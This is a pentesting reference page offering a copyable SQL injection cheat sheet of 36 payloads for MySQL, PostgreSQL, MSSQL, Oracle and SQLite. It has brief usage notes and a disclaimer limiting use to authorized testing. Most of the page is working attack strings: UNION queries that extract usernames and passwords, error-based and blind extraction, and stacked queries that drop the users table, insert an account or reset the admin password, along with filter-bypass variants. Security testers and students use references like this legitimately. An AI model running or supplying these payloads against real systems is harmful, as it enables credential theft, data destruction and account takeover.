Skip to content
PwnDeck logoPwnDeck

SQL Injection Cheat Sheet

Interactive SQLi payload reference organized by database (MySQL, PostgreSQL, MSSQL, Oracle, SQLite) and attack type (detection, UNION, error-based, blind, time-based).

36 payloads

all

Basic boolean-based detection

' OR '1'='1
all

Boolean with comment

' OR '1'='1' --
all

Double-quote boolean detection

" OR "1"="1
all

AND-based true condition

1' AND 1=1 --
all

AND-based false condition

1' AND 1=2 --
all

Column count enumeration

1' ORDER BY 1 --
mysql

Time-based detection (MySQL)

1 AND SLEEP(5) --
mssql

Time-based detection (MSSQL)

1; WAITFOR DELAY '0:0:5' --
all

UNION with single column

' UNION SELECT NULL --
all

UNION with three columns

' UNION SELECT NULL,NULL,NULL --
all

Extract credentials

' UNION SELECT username,password FROM users --
mysql

List tables (MySQL)

' UNION SELECT table_name,NULL FROM information_schema.tables --
mysql

List columns (MySQL)

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users' --
sqlite

List tables (SQLite)

' UNION SELECT name,NULL FROM sqlite_master WHERE type='table' --
oracle

List tables (Oracle)

' UNION SELECT table_name,NULL FROM all_tables --
mysql

ExtractValue error-based (MySQL)

' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e)) --
mysql

UpdateXML error-based (MySQL)

' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1) --
mssql

CONVERT error-based (MSSQL)

' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables)) --
oracle

UTL_INADDR error-based (Oracle)

' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)) --
mysql

Floor error-based (MySQL)

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --
mysql

Boolean blind character extraction

' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a' --
mysql

Binary search blind (MySQL)

' AND ASCII(SUBSTRING((SELECT database()),1,1))>64 --
all

Check table existence

' AND (SELECT COUNT(*) FROM users)>0 --
mysql

Database name length check

' AND LENGTH(database())>5 --
mysql

Time-based blind IF (MySQL)

' AND IF(1=1,SLEEP(5),0) --
postgresql

Time-based blind CASE (PostgreSQL)

' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END) --
mssql

Time-based blind IF (MSSQL)

'; IF (1=1) WAITFOR DELAY '0:0:5' --
mysql

Benchmark time-based (MySQL)

' AND BENCHMARK(5000000,MD5('a')) --
all

Stacked query: drop table

'; DROP TABLE users --
all

Stacked query: insert user

'; INSERT INTO users VALUES ('hacker','password') --
all

Stacked query: update password

'; UPDATE users SET password='hacked' WHERE username='admin' --
all

Comment as space bypass

1'/**/OR/**/1=1--
all

Newline as space bypass

1'%0aOR%0a1=1--
all

Mixed case bypass

1' oR 1=1 --
oracle

Oracle concatenation bypass

1'||'1'='1
all

No-comment bypass

1' AND 1=1 AND '1'='1
Advertisement

How to Use the SQL Injection Cheat Sheet

  1. Search for specific payloads using the search bar.
  2. Filter by target database: MySQL, PostgreSQL, MSSQL, Oracle, or SQLite.
  3. Filter by attack category: detection, UNION, error-based, blind, time-based, stacked, or bypass.
  4. Click the copy button to copy a payload to your clipboard.
  5. Read the description for each payload to understand its purpose.

About SQL Injection Cheat Sheet

SQL Injection (SQLi) is a critical web vulnerability that allows attackers to interfere with database queries. This cheat sheet provides a reference of common SQLi payloads organized by database type and attack technique. Detection payloads help identify vulnerable parameters. UNION-based payloads extract data by appending additional queries. Error-based payloads trigger database errors that leak information. Blind and time-based payloads extract data one bit at a time when no direct output is visible. This tool is for authorized security testing and education only.

Advertisement

Frequently Asked Questions

Database fingerprinting techniques include: checking error messages for database-specific syntax, trying database-specific functions (e.g., version(), @@version), and observing comment syntax differences. The detection category includes payloads that can help identify the database.

These payloads should only be used in authorized penetration testing engagements or controlled lab environments. Using SQLi payloads against systems without explicit permission is illegal. Always obtain written authorization before testing.

Related Tools

XSS Payload Generator
Exploit Payload Encoder
Reverse Shell Generator